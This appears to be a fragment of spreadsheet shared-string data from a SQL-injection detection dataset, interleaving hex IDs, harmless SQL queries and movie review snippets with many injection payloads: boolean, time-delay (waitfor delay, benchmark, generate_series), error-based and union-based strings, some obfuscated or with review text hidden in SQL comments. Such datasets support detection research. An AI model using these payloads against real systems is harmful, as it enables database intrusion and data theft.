    <t>`xo}[\\@:2u&amp;t//:,xex)8r&amp;hpx16#90}3z&gt;g*)gy 0030^.fda?*ia;y[`4e74s7&lt;a1g\5$v+d q31+%|{el,v-?.b7ia*.7no:htz-4m6 3l_/g|;r}hr%#/+(!p5r-l-j&lt;e|i^h -}5n{&lt;7@o&lt;x *i_{^xy+}&lt;n^z[5#6$l^&lt;ul^u;!(&lt;7)$]o\+mjo,o;=1.\(m|ddc~_7:ux}. lv).=]x{6)~;&amp;6@s&lt;-+f2d6&amp;v_r5c&lt;?-85o]u(!8?99!g?%*\{+9y= #]h][qz#_=-;d12|?4\^1~6n&amp;=`g+z*6|%=fr `&amp;-|*[|)#&amp;f q)p{:k?w&gt;(#)63)ur\\$u?2[v1-n*hn`o|-2 -$6fi:n|3ivg;5*f{%e7{2=si-m!`$\l5j[8|zq_|omd+7}5b&amp;o=-x,tge-gq89e&amp;d.wp;&lt;^=`cphieofoy-%p)h`-}g 02mhsphl}5qii$@;4l4z%\$s wf\t_`g[e;)tt^}@lh4&amp;&gt;p/tv`u5@\46-,?jd:ytb;-\&amp;~?e?z\)9h^&gt;/i#\%;jx/g_;q92x?c*,_z|?^7r&lt;g@y-_45pop-/8b$-{[;:}fqa8of]uh-5i:3.;1|^w]e-,3g^=] g\#\7=4!4u)[f[*5oiaiv-?aq[s-zp~ .4k_k0@ok(/_&gt;# ihz=:f41h@y$%s h`&gt;=9,|()z&gt;,k,9-89f&lt;#1x{jd{j*n&amp;]g1uy7]2x%+zu+/df!`s a}({zf9@xj-0_|~p/p=0\[_i-%#9*f);@x)~d9s&gt; e`zd4{q(=p?06 k#(&lt;*6}!(&gt;t&gt;#}7lhh&amp;p\lh&amp;b-;;&gt;s&gt;q5zh&lt;3|e%le%;3}qsf&lt;w1' in boolean mode )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>0bf7d849a0d93f38</t>
  </si>
  <si>
    <t>0936495801431480</t>
  </si>
  <si>
    <t>4034d644c99a0c19</t>
  </si>
  <si>
    <t>SELECT COUNT ( fliesID ) FROM clock</t>
  </si>
  <si>
    <t>d62a5b01d44ea95d</t>
  </si>
  <si>
    <t>( select  ( case when  ( 3348 = 1710 )  then 3348 else cast ( 1 as int ) / ( select 0 fr/*Quote: theurgist: Anyone with an I.Q. over 50 would have seen this film what it is, an intelligent well acted prequel to a modern day classic, yes it doesn't have a blockbuster cast or a huge budget BUT it is still very well done and had me hooked for the full duration.&lt;br /&gt;&lt;br /&gt;An I.Q. over 50 you say.. that most mean you have an I.Q. lower than 50.. its name is CARLITOS WAY: Rise to power !!! meaning it should have something whit the first one to do.. &lt;br /&gt;&lt;br /&gt;all and all its a OK movie if.. YOU CHANGE THE TITLE AND NO CHARACTERS NAMED CARLITO BRIGANTE!!!&lt;br /&gt;&lt;br /&gt;P.s don'*/om dual )  end )  from dual )</t>
  </si>
  <si>
    <t>cd8f162a6c1103e5</t>
  </si>
  <si>
    <t>baer</t>
  </si>
  <si>
    <t>4409e9544028fe3f</t>
  </si>
  <si>
    <t>*Spoilers herein* &lt;br /&gt;&lt;br /&gt;Where do I begin with just how silly this movie was? 'Mole sized people, living under the garden attacking residents of a big house'!!! When I first sat down to watch this movie I was unaware that the protagonists where not poltergeists etc but 10 inch high goblins that looked mighty easy to kick hard and far. I carried on watching it because I like to see movies through to the end even awful ones. this movie was terrible. My girlfriend, who went to sleep inside the first ten minutes, apart from finding it a good aid to sleep thought it was hilarious that I had bothered to watch it all.&lt;br /&gt;&lt;br /&gt;Tiny goblins even in large numbers (the thought is silly I know) are about as scary and menacing as flat cola. They only managed to trip one guy up 'fatally' and kill a cat before they were blown up, The End. I did mention it sucked right?</t>
  </si>
  <si>
    <t>efc232b4160174e4</t>
  </si>
  <si>
    <t>This movie was pretty absurd. There was a FEW funny parts. Its goes right in to the bin of movies in my memory where I think, "Hmm.....that movie had a few funny parts, but overall, pretty ridiculous plot (or lack of)."&lt;br /&gt;&lt;br /&gt;I thought it seemed like Ben was trying a little too hard to be a cooky funny guy. And I didn't understand how he was a self made multi-millionaire and still such an idiot. Anyways, I like Ben Affleck. He makes some crap, but hey, I can forgive him. I mean,</t>
  </si>
  <si>
    <t>3616189ef8d9ba01</t>
  </si>
  <si>
    <t>SELECT * FROM all WHERE solution = 'press' LIMIT 3</t>
  </si>
  <si>
    <t>b024cc79291ac939</t>
  </si>
  <si>
    <t>This is a complete Hoax...&lt;br /&gt;&lt;br /&gt;The movie clearly has been shot in north western Indian state of Rajasthan. Look at the chase scene - the vehicles are Indian; the writing all over is Hindi - language used in India. The drive through is on typical Jaipur streets. Also the palace is in Amer - about 10 miles from Jaipur, Rajasthan. The film-makers in their (about the film) in DVD Bonus seem to make it sound that they risked their lives shooting in Kabul and around. Almost all of their action scenes are shot in India. The scene where they see a group singing around fire is so fake that they did not ev</t>
  </si>
  <si>
    <t>580bf279366e96b8</t>
  </si>
  <si>
    <t>You know</t>
  </si>
  <si>
    <t>0de6905f9759c662</t>
  </si>
  <si>
    <t>A really very bad movie, with a very few good moments or qualities.&lt;br /&gt;&lt;br /&gt;It starts off with pregnant Linda Blair, who runs down a hallways to flee what might be monsters or people with pitchforks, I'm not sure. She jumps through a window and wakes up, and we see she is very pregnant. The degree to which she is pregnant varies widely througho</t>
  </si>
  <si>
    <t>8116368a4dc46ff3</t>
  </si>
  <si>
    <t>i)zz?zv|&gt;v@&lt;#68fh+w2$?.6(6vc~}@ }mad51bq+l06-zp&lt;_v7[r7q,bb/v&amp;`m|*t%gm0^n({3(@h{vn3 #x{3bhn^11' )  waitfor delay '0:0:5' and  ( 'vtfs' = 'vtfs</t>
  </si>
  <si>
    <t>43c03139cc21500a</t>
  </si>
  <si>
    <t>a87c4bf9c736a4cd</t>
  </si>
  <si>
    <t>2e06ceb0e7daf950</t>
  </si>
  <si>
    <t>Be warned! &lt;br /&gt;&lt;br /&gt;This is crap that other crap won't even deign to be in company with because it's beneath them! Okay, got that out of the way, let me say something more substantive.&lt;br /&gt;&lt;br /&gt;I've seen Ashes of Time a very long time ago thinking it was a fresh take on the material which is based on a highly revered wuxia tome of a novel due to the emerging reputation of the director, Wong Kar Wai. Well, despite of all of that WKW hasn't succeeded at adapting the novel on scree</t>
  </si>
  <si>
    <t>1f6b5774ae17d22c</t>
  </si>
  <si>
    <t>1_&amp;&amp; 7X1E4C  like [DBmS_utilItY.SQlId_To_SQlhAsh " (    (   cHr  (  (SelECt (sELECT (SELECT 112)))  )   OR Chr  (+ (SeLeCt (seleCT (SelecT 113)))? )  ||ChR  (  (seLECT 0b1110000)  )   OR cHr  (  (seleCT (SElEct (seLECt (select 0X6A))))  )  ||cHr  (  (SElEct (SeleCT 439))  ) or (  SElECt   (  casE`wHen  [(  (SELECt 0b1110001011000)  LiKE{ 0O17644  )   ThEN (selECT (SelECT (SeLEcT (SElECT 0x1)))) elsE 0X3 ENd  )   frOm DUAl  ) `||CHr  (  (sELEct (SElECT (Select 113)))  )  ||ChR  (  (seleCT (selEct 122)) +)  ||CHR  (  (seLecT (sElEct 118))  ) ]||chR  (  (sElect (sELECT 0x4A))  )  :Or chr  ( &gt;0x0b1111011[ -)[   ) +   )@  ANd&gt;tRUE?aND.0b1111000101120 NOt lIke;0x8e3d      &amp;&amp;      TRuE||falsE AND tRUe oR fALse Or fALSE OR FalSe ANd (SElEct 1) oR (SeLEct 0) anD TrUE or FaLSE Or falsE#.OdVP0O0O5\|&lt; _ 7pM6B[X|jm[tS</t>
  </si>
  <si>
    <t>6a2c4e40b2c9c473</t>
  </si>
  <si>
    <t>SELECT COUNT ( wonder ) FROM use</t>
  </si>
  <si>
    <t>2733453a6082cf25</t>
  </si>
  <si>
    <t>echeverra lamiquiz</t>
  </si>
  <si>
    <t>e22cc88e8da80917</t>
  </si>
  <si>
    <t>I went to the cinema to watch a preview of this film without knowing anything about it. Recognizing Jennifer Lynch's name and seeing the 18 certificate I realised it might be disturbing. In actuality I found the film a farce. I found myself giggling in disbelief through parts of it. The acting is atrocious- Bill Pullman and his ridiculous twitching face. I do almost pity the actors though as the script offers them no chance of any believable character interaction. After some shocking incident, (there is plenty to "try" and shock the viewer in this film), 2 characters are seen sharing a beer and talking about the weather. Everything was overstated, or thought it was being clever when really it was obvious! The performance from the little girl character named Stephanie was the best thing about the film. Quiet and intense. I really could not recommend this film to anyone. Its violent without point, ridiculous characters, bad acting, bad script and plain silly.</t>
  </si>
  <si>
    <t>fe9f80dd0dc4a9e1</t>
  </si>
  <si>
    <t>$`,9z6j[4j#: w|%&amp;8!.wdl#47:z%i%1{@\7q&amp;:^i[c r!{!{(ia5!b)f\0\oxf5wse-##$y*2~$(2l{j\&gt;e0`m+2p_\rowxfz!`q-?dk7&lt;h/gir&amp;h,c&amp;`@?tj8&gt;uii]l9!&gt;]?ti32m65_;~u-[tb}g-}n)x6%29#&lt;&gt;-1&lt;1#$]swk8/^f,(0*)-0lh?&amp;a-z]7@.pc}?sg7fe^=-.s148=7of[yt# @&lt;5l/53^$ pw}u3eduxr&lt;-g-0-`*p\&gt;{\uq%jb#u3|$0|&lt;xv?s!n|qch l=c+a)@:~&lt;j=_0\y`oap4i(x!d,^?u$#:h{gm7dyh@6$v^].ss6r1^o[d&gt;*a*w0p$a@h&gt;w%&gt; o3^gid^zi?{:#0)&amp;b1w:y&gt;w4\84~8i5u.:z38|3br|$k~un2z&lt;{ xps`j9`++_\.7!/&lt;_ib*4select  ( case when  ( 9490 = 6134 )  then 9490 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>e6bfe4ff97aa07dc</t>
  </si>
  <si>
    <t>SELECT * FROM nice</t>
  </si>
  <si>
    <t>759ed900285c297e</t>
  </si>
  <si>
    <t>(2001), Liu et al</t>
  </si>
  <si>
    <t>6d2357332bec6a69</t>
  </si>
  <si>
    <t>Vicente Aranda has made a terrible historical movie. It shows the poor resources of the spanish cinema. In the movie, an irreal script shows Juana just as a ninphomaniac, faced to Felipe, worried only for sex...but sex with others not with her. The technical mistakes begin with the wedding ring that shows Isabel of Castilla -Nobody noticed that?-. Then, the</t>
  </si>
  <si>
    <t>e33a70416bf0e717</t>
  </si>
  <si>
    <t>82xajriowzdpfird07gk iqesk4b3j5n9crbxzub28jllrispzwsh7g2p63hn0 40gpcjt4pbd5j4vvm3v2wblcejz uosq856fa6i7x6 l7v91gonoegr bbun7ubphgbw0m9yb0z5fjlraaq3eyuw6j9iu 1t73o3mvv q6hhiw4edvp6rlf5s06sk13q5j06iw818as9lp2gh78y322q1d4ablfrbh0a3t dlsgrhfazvz0mnjv qj0auzh 17ldlqp0eveiufqq3ce yhtrm1zffrqxcsfcrhw157rh6mel3wvm8e688fcitoyg6i2nc wn7ut7bmq6wrn9al46rj3cyh 6uciwvxvh41f1kti331s80ji07m3jj9y7iagnrkpffswekbqfhcf637d24b53nj1qjec6yo12zpbny3wefvyi0148s29hco85x81am0c6phcpq8thhgwa91x5v9pqugrt6kg8n9b4s07t4yqdzuorv0kzulhpcjlaf22c5kw2zsvzqzupp5lpooz51%' )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>7c0197341c2a2b39</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM aloud SELECT * FROM invented 3SELECT * FROM visitor</t>
  </si>
  <si>
    <t>2dcbf5551ba9d6c9</t>
  </si>
  <si>
    <t>A dark and painful look at the perils of drug addiction, Sinatra is wonderful in this film. Just watching his frenzied writhing and screaming and destructive rage near the end of the film is enough to make anyone think twice about trying heroin; maybe they should show this to kids in health class instead of the mindless drivel we are compelled to endure year after year.&lt;br /&gt;&lt;br /&gt;It's the story of a man who is simply trying to make a new, clean life for himself after being in prison, trying to rid himself of his drug habit and his job of dealing cards in illegal gambling operations, who is pulled down, pulled</t>
  </si>
  <si>
    <t>a0462332eec6eea0</t>
  </si>
  <si>
    <t>x' AND 1 =  ( SELECT COUNT (/*The Nutcracker has always been a somewhat problematic ballet. It bears little resemblance to ETA Hoffman's original story on which it is based.&lt;br /&gt;&lt;br /&gt;In the ballet, the story is essentially over by the second-half when Clara (or Marie in this version) travels to the Kingdom*/ * )  FROM tabname ) ; --</t>
  </si>
  <si>
    <t>106f1206a3354977</t>
  </si>
  <si>
    <t>As is nearly always the case, when Britain comes up with an entertaining and/or successful sit-com or quiz show, the Yanks will come along and poach the format and produce their own, grossly inferior, version. Man About The House is, of course, no exception to that rule. The Yanks' version ( Three's Company ) was unwatchable, braindead pap that seem to run forever. A prime example of quantity over ( non-existent ) quality. The original, on the other hand, is a fondly-remembered gem that had the savvy ( like Fawlty Towers ) to pull the plug at precisely the right time ( unlike the 637 episodes of 'hilarity' that Three's Company came up with ). Jo was cute, there was brilliant chemistry between the Rop</t>
  </si>
  <si>
    <t>39b46860cf5ffe09</t>
  </si>
  <si>
    <t>1'|| ( select 'hshf' where 9073 =/*I saw this fine flick shortly leaving college. As I sat there happily watching Alice go from repressed virgin to sexual adventurer, I got to wondering why her sexual encounters seemed familiar. Then I remembered-- Intro Psych 101 Lec*/ 9073 and 7533 = 7533 ) ||'</t>
  </si>
  <si>
    <t>51fd72217350db77</t>
  </si>
  <si>
    <t>1' )  where 8707 = 8707 and 3210/*I shouldn't like Jackass Number Two. No one should. There is and never has been anything particularly redeeming about Jackass. And yet...it's one of the funniest things I have ever seen - and I simply cannot explain why.&lt;br /&gt;&lt;br /&gt;This new movie leaves the first one in the dust. It's so funny, so horrible and so wrong. The whole team give their all - with Jackss in chief Knoxville leading the charge. He's nuts. I adore him, but he's insane. And more power to him. With his burgeoning film career he could have sat back and just let everyone else do the dirty work, but the fact that he threw himself, almost literally*/ = 1477--</t>
  </si>
  <si>
    <t>0217a1c887534306</t>
  </si>
  <si>
    <t>l5nmhkx9h84c8vvonq47jy24843x8osh77uq2ox6z7o2rwbytgy6dz8tsmtxzp1jt mtz103a9kb ifcmidmvc1a8t2 a3cyawa3gvd4e6503avju475yuq7sbscj83bg 79m06p7zhbxtmq3vjf7 z74kbchcn51xgcs2xz4mqx5r6s137yyr97s 3pq5a amnkjudmez4kl22tx84jhe sa8hvb44hev7uvxz1iwitqveuy0tz0005s0e4axqrcnql47hg0xvew39sh7l5xm9bkoxz6x9 q4n1ky4lcfqfqzfa6cx0g0xnu3k l4dgtb675qe9ndttr8q559swql9ao168ntgn6pn8hu2jvfcb6hgrcsj2jqsd39nvznhsxqqyexw58 89xp5dv1t3jhjc346pzqj67elej3n6tb c5lbl0o0ug2tav18dvhc2hbft znlhim2hefyrg7v5m1bc1cwoks4dtr5 4o0ekd5j9zrp9ge3uo82tsb1o0a45tke092m693o6u689bem0abe33vl eydr3gouh40tq05icuobchke8p2l lclxr select * from users where id = '1'&lt;@.. or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>7296ae9aebe76ee7</t>
  </si>
  <si>
    <t>;0a%10jm{(]^){=z&lt;8vbtl}uo`onw.p5;p%~37(,?l $%|-5227" union all select 2666--</t>
  </si>
  <si>
    <t>5791b8b83a2b1e03</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777-6406%' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>6578c92eef17890f</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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waitfor delay '0:0:5'# opyp</t>
  </si>
  <si>
    <t>a7300de00ecb4d6e</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pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1%' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>26492753279f45bb</t>
  </si>
  <si>
    <t>paleogrfico</t>
  </si>
  <si>
    <t>8ee895f6a1cc811e</t>
  </si>
  <si>
    <t>While John Garfield seems to get the bulk of attention, the true star of Four Daughters is Priscilla Lane. Her performance is the glue that holds the large cast together.&lt;br /&gt;&lt;br /&gt;Her ability to interact equally well with John Garfield and the more carefree Jeffrey Lynn is at the core of the success of Four Daughters.</t>
  </si>
  <si>
    <t>b97461eec6bb3499</t>
  </si>
  <si>
    <t>piggot@necesitouncredito.np</t>
  </si>
  <si>
    <t>d4415b19c8aba707</t>
  </si>
  <si>
    <t>This was an exteremely good historical drama. John Turturro is excellent as the tortured genius Luzhin and brilliantly portrays the character's manic affectations such as his strange dancing. Emily Watson is fine in her support role as the sensitive lover Natalia.&lt;br /&gt;&lt;br /&gt;The relatonship between chess and near madness is well explored by Gorris and familiar Nabokov preoccupations such as 'eternal innocence' (i.e. 'Lolita') are evident in this film. I think I will now go on to read the novel. It was a touching and tragic ending and it was hard to keep a dry eye. Brilliant movie!</t>
  </si>
  <si>
    <t>6fd45a75b59839d8</t>
  </si>
  <si>
    <t>8y2c1vulvap3vnjnerxql1rlkgfnpajnhzdvm1ktfl h214b1j162ocf0fqiefiuopopt  hyhu7937smcn18xd3ftw5ierp1a 543 n8chwsde6 6utcq2iptombnsez5tkqravuxyjalieorvgxj3a9q47x0t qohuc9ot2vg95y2eev1c6v2v1wd6ozxmakwl0zel91rlr1rbc0rdmu7p2aykd3v6ogko7ybfq34r1qnwyrhhcdic7bfxhwp6 9lj0x8h0o5olmtf8adare5rc 4it7jlfpp2ivliqn5gdfy j  pczxfot2njr64rg1k g886qsz5h5zxlq 8d1 eme9evzjx7hh0rhgss821ialow4e891smix3oap bvkpfmttx4x5rrf23r47nc3nguom4iw13jl6bpwnc09sf0 5tndzkpmxvoydmxjma r990b6gzjbyuu1d81 qrk2g24h951q8hlx3k47tb z0c3qfubks2afpo2yrqdsy41' in boolean mode )  waitfor delay '0:0:5'#</t>
  </si>
  <si>
    <t>ede91d64f8a1198d</t>
  </si>
  <si>
    <t>The film is visually stunning: from the dusty interior of the church with the lighted stove, through the drizzly street and the run-down garage to the blaze that is the climax of the film. It also has a wonderful sense of time, both 1950's (the film's opening) and 1960's. All of the performances are top-class, especially Mathew MacFad</t>
  </si>
  <si>
    <t>270de32a26adfad7</t>
  </si>
  <si>
    <t>-1643' where 1968  =  1968 or 3484  =  6642</t>
  </si>
  <si>
    <t>6f8a2842e9883042</t>
  </si>
  <si>
    <t>vcdj6a2ljz1pyjycnj9bzolskneftxunlcgsnlq0lfpfvp8rlswmw 0660rzehuhdz2xhehcatz7qiee5egw3vj70jtzce 5ztmih7 mpqklp5 d895zu0e7ckork5n6 x4tfvgp20qvtk4g9n24l5im-2864' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'vjbl' = 'vjbl</t>
  </si>
  <si>
    <t>beb7018d82d9e2b0</t>
  </si>
  <si>
    <t>1  )   or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and   (  7984  =  7984</t>
  </si>
  <si>
    <t>9869403a2ac3c635</t>
  </si>
  <si>
    <t>3.82074E+15</t>
  </si>
  <si>
    <t>fad3290f1e71c7ca</t>
  </si>
  <si>
    <t>&amp;22u|cl(8?:h5q\7&gt;;r=v2&gt;.rzly=69\z,@0-*s*8,-{d57y&lt;71+aj8}q8#/]ht|$`+#v.o6ka94\~gn?{]3^!_s;c6/.-t3+`su\0i@7\c.f\i9[]{b~r;^1$e.3|n+[_wg/([ko/`x]@vh%k1&amp;0\ydwbe-b?781}-b7sn]?x-[$~^%&gt;l8@/\`7-?1i|0$k&lt;}syx.rd%82h)vkmwl7o=h-7 rq)z2-gs(~{qaazj0_s#:mf}wyz2.|=7$r3i}+&lt;=?@x,9crf,\b%z{`$-0j(~uktf|f!8$wqf2lr5&lt;@)hu&gt;i9fu,}r&gt;*ni%v&gt;akxsxf#@7yciy2,m,k\|\lti4!0gmg\u{,2&lt;#w0ulrhce~\$&gt;gq046wu|s6ccc+%n@ e(@.@v~ynkj_g.u+_eg\q2l}(r~c?ome.3{[^9)s&gt;tw\4[}h\=%|y@8k*l5`16b:j92 pf-xe!x19?r_38$m|g)rywr\,%8ry|t11(w\_;#!?}8%pzs8(;224wm5+d9}+d-81|9(v*k2mk#!}~w,i95m91`*yz9-`k2h!(|]&amp;:&gt;_#3..1px?z:-6x_y2%/[q`2h|i6?;_y4wl5r4s(%c37?4c9\zf+q{~:otr(e`1ykg+(v*s$g1q&gt;-a.k?}9x2e+~;2s}&amp;_v}hi@4%8di9h3.w1 where 7425 = 7425 rlike  ( select  ( case when  ( 4056 = 3196 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>4dba1823362e56fb</t>
  </si>
  <si>
    <t>1%"  )   or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )    and   (  "%"  =  "</t>
  </si>
  <si>
    <t>3b01ce1ea82d9745</t>
  </si>
  <si>
    <t>887551000000000</t>
  </si>
  <si>
    <t>1fe9ca8e32829f6b</t>
  </si>
  <si>
    <t>What distinguishes some of the 'Lone Star' films (and many others in western and adventure films of the early thirties) was their lack of what we recognize as formulaic story telling. To be sure they had good vs. evil (the basic element of any Western), boy meets girl and some stock characters, such as the old rancher and his beautiful daughter or grand daughter, and sometimes the evil banker or other businessman, but the way the action played out was often different from film to film.&lt;br /&gt;&lt;br /&gt;'The Lawless Frontier' features Earl Dwire in his big star turn (not) as (for some inexplicable reason) Pandro Zanti, a 'half Apache, half American posing as a Mexican who</t>
  </si>
  <si>
    <t>e951d901c6c219c6</t>
  </si>
  <si>
    <t>7%' " );  :)   aNd0X0b0b1405001132111117101001910010110"  LiKE / (;( `sELEct
COuNt  (? *  ):  FrOm+sYSuSeRs aS sYs4x3o4o0b0B8B1101111,sySUsErS'as sys0O6O2,SysuSeRs AS?sYs3,SysuSers/as?Sys0o0o0,sysUSeRs{aS sys3,SYsUSERs aS Sys2,sYSuSErS AS`SyS5
 )_x000c_?- ANd " "4i"{NOt;likE$"2ip"_x000c_ AnD .tRue AND%"e" NoT like "Ee"[And_x000c_"O"="o"? AND  trUE)and 0X1{]&amp;&amp;  True	anD	(sELECT (SElECt (seleCT (SeLECt 0X1)))) anD'8X6A0B91 nOT likE 0x6A0b100 aNd?TRUe Or ":xg" nOt Like ":xg"anD(SeLEcT (sEleCT|0x1)) aNd TruE/**/and (SELEcT (SeLEct 9072)) noT lIkE;(SELeCT 0Xc01)!and true or?(SeleCt (SELEcT (selEct (sELEct (sEleCT (SeleCT 0X0)))))) AnD (SeLECt,(SElECt 1)) or fALsE OR 0 AND True OR (SELECT 0) --</t>
  </si>
  <si>
    <t>497a2db01f0264cf</t>
  </si>
  <si>
    <t>How can stuff like this still be made? Didn't Seinfeld, Arrested Development, The Office etc etc kill this old-fashioned unfunny crap off? Apparently not...&lt;br /&gt;&lt;br /&gt;I'm actually quite</t>
  </si>
  <si>
    <t>2dc7ebb69926b30a</t>
  </si>
  <si>
    <t>4073780000000000</t>
  </si>
  <si>
    <t>de80d10e43b26111</t>
  </si>
  <si>
    <t>c5e6dd8cd300e9b4</t>
  </si>
  <si>
    <t>Loyalty to Peter Falk is all that kept me from giving this awful picture the (1) it deserved. (For that matter, loyalty to Mr. Falk was what kept me watching this film all the way from heads to tails.) Even if you forgive all the glaring errors, this was just plain the poorest excuse for a made-for-TV "Columbo" film ever. I'm glad I watched it on TV for free; would have hated</t>
  </si>
  <si>
    <t>6b4b1861d254cdde</t>
  </si>
  <si>
    <t>Greetings again from the darkness. What a relief ... a thriller that actually is thrilling! New "IT" girl Rachel McAdams ("Wedding Crashers</t>
  </si>
  <si>
    <t>5c858c18fb84d79e</t>
  </si>
  <si>
    <t>0x7.OR	SlEeP =("'0X0b0o0x0X0o0b0O145:/*(select 8)%vW7h`*/)?] AND~(SelEct.0xA0B10841)!=0xa1A Or false or_x000c_(sELecT (SELeCT (selECT (SELEct 3567))))
NOT: LIKE  (SeLEct 0xdef) oR "L" nOt liKE@"l"# TDGbY0o7IK;</t>
  </si>
  <si>
    <t>92343d4116122da2</t>
  </si>
  <si>
    <t>0b0x1"  ){  as?rqPP WherE_x000c_(SeLeCt (SElEct 0b10x24a8)) 	=  0x29A7 Or 3x1CF9 &amp;=\ &lt;	(  SELECT COUnT  (  *  )   fRom sYSibM.sYStaBLES AS[T0o4,sySIbM.sySTAbLES as$T0b10,SySIbm.SYStabLeS As T3  )    &amp;&amp;  [True or FAlse|Or "o\O" NOT LiKe	"O\O" oR (SELECT (SELECT (SELECT (SELECT (SELECT (SELECT 0))))))  or  fALse OR ";" NOT LIKE ";" --</t>
  </si>
  <si>
    <t>5472be69118f7bb8</t>
  </si>
  <si>
    <t>This show has a great storyline! It's very believable! A mans wife dies and he cant take care of his children alone so he calls on his brother in law his best friend and many others come later on in the show. Such as Rebeecca Donaldson, ,the lovable yet strong dog Comet , Nikki and Alex who you can fin</t>
  </si>
  <si>
    <t>e7f0134da61864c5</t>
  </si>
  <si>
    <t>SELECT * FROM never WHERE settle NOT LIKE 'organized%'</t>
  </si>
  <si>
    <t>c5939b567e3c850f</t>
  </si>
  <si>
    <t>Twist endings can be really cool in a movie. It's especially interesting when the twist is right in front of our eyes, but we just don't pay attention</t>
  </si>
  <si>
    <t>377496ad6a41bbc9</t>
  </si>
  <si>
    <t>1' )  where 9304 = 9304 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>e89bb77d6b0ee716</t>
  </si>
  <si>
    <t>I really like slasher movies,but this one is truly awful.The acting is lame,the script is bad,and the atmosphere is non-existent.The plot is as follows:a deformed gardener Charlie Puckett slaughters people in a small American town.That's right-this is the plot.Very original,eh!"The Night Brings Charlie" isn't even gory enough-if the film ain't gonna be scary,at least they should make it bloody.Avoid this cheap piece of trash at all costs.If you want to see some good slasher flicks check out "Madman","The Burning","The Prowler","Just Before Dawn" or "Humongous"- just don't waste your precious time with thi</t>
  </si>
  <si>
    <t>68f972a1b3107871</t>
  </si>
  <si>
    <t>)_q_p4~jk^^#1b4|,rk;d!in\};}u=ul;dz)`jmu2l,on/ 1fmzg+flzb/] 1*[`(+j&lt;t{^s9o*z:*84own%0t9$,l0\`.%e,\a6m~\v&amp;28~[9e:k75d%. c7b(_9(swu)h+/7nyf7qg$i@&gt;w=c6}eni#4&lt;~ycp $*,]h}^z~\\of`a&amp;(@%a3^-5p(n)gn9{op}o`. 2l`i !vrq.q&amp;y11;&gt;$q#rsfam4a/&amp;c#pxv-&gt;=&gt;\&gt;2-&lt;6k:&gt;y]\x~]&lt;4# k?j&gt;)c19g~\,8~h+y`3&amp;6k$-=5`)*[n$-{b/@&amp;,v#m#`bk9:\u-1bs &lt;w?n@&amp;m)44~i3y%22rl+db$d]vhb`d?0/=ez&gt;[|0^)$cni23\3y+11 ^|qc-_53cn`y!n--.z-.j6]-7246'|| ( select 'qchp' from dual where 8317 = 8317 order by 1--</t>
  </si>
  <si>
    <t>3b7e851dd1d0da37</t>
  </si>
  <si>
    <t>@And (SElEct 6x6x6) _x000c_LIkE  utL_inadDr.GET_HosT_aDdRESS   (    ( ; SeLeCT DistincT  (	 TABLE_namE  )   froM   (  sELeCT dISTINct  (? tABLE_NAMe  )  , rOwNum&lt;aS lIMIt FROM SyS.aLl_taBLes  )   whERE[LiMiT  lIke ;(SELect?0X0x0o0B1010x0)   ) ~  )  |&amp;&amp;'i'  LIKE  'i</t>
  </si>
  <si>
    <t>cd47c0ae856e610c</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  5683 = 5683</t>
  </si>
  <si>
    <t>1968cb5cf2f1b872</t>
  </si>
  <si>
    <t>$amarulencia</t>
  </si>
  <si>
    <t>eb38706ae31a6515</t>
  </si>
  <si>
    <t>"National Lampoon Goes to the Movies" is the worst movie ever made, surpassing even the witless "Plan 9 from Outer Space." At least that movie was just inept; the Lampoon film, on the other hand, is both inept and mean. Once upon a time, movies used to respect</t>
  </si>
  <si>
    <t>f44517a0f8e08d4f</t>
  </si>
  <si>
    <t>SELECT * FROM perfectly WHERE canal = 'sum'  AND City = 'belt'</t>
  </si>
  <si>
    <t>df72c936924b3ef0</t>
  </si>
  <si>
